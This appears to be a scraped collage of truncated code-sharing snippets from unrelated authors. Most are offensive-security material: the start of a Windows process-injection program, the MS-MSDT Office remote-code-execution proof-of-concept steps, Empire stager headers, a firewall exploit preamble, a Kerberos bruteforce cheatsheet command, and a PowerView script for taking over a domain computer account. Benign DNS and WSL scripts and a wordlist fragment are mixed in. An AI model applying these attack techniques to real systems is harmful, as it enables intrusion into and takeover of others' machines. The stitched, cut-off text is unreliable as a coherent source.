RistBS

#include <Windows.h>
#include <stdio.h>


#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

#define WORKER_FACTORY_FULL_ACCESS 0xf00ff 

typedef struct _UNICODE_STRING {

tothi

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.

christr

#!/bin/bash
# Modified by Chris Richardson (https://github.com/christr and https://twitter.com/christr77) on 09/20/2020
# Previous versions of this script don't work because they hadn't been updated since 2012. There are now more steps involved to set this up.

# This script update is based on information found here: https://developers.linode.com/api/v4/domains-domain-id-records-record-id/#put

# You first must find out the domain ID and resource ID numbers. In order to do this follow the steps below.
# 1. Create a Linode API Key through your account profile at https://cloud.linode.com/dashboard. Give it rights to read/write to domains only.
# 2. From a shell run the following command: LINODE_API_KEY=[insert API key from step 1 here]
# 3. Run the following command to get the domain ID number for the domain you want to manage: curl -H "Authorization: Bearer $LINODE_API_KEY" https://api.linode.com/v4/domains/

rqu1

#!/usr/bin/env python2
import urllib2
import struct

# Constants
ip_addr= '172.31.21.2'

# PA-VM
# 8.0
scep_offset=24

whid-injector

from lib.common import helpers

class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'WHIDLauncher',

            'Author': ['@LucaBongiorni','@xorrior'],

whid-injector

from lib.common import helpers

class Stager:

    def __init__(self, mainMenu, params=[]):

        self.info = {
            'Name': 'WHIDLauncher',

            'Author': ['@LucaBongiorni','@harmj0y','@kisasondi'],

xmeng1

$remoteport = bash.exe -c "ifconfig eth0 | grep 'inet '"
$found = $remoteport -match '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}';

if( $found ){
  $remoteport = $matches[0];
} else{
  echo "The Script Exited, the ip address of WSL 2 cannot be found";
  exit;
}

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

HarmJ0y

# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1

# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
whoami

# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"

jhaddix

`
~/
~
ים
   
 
___
__
_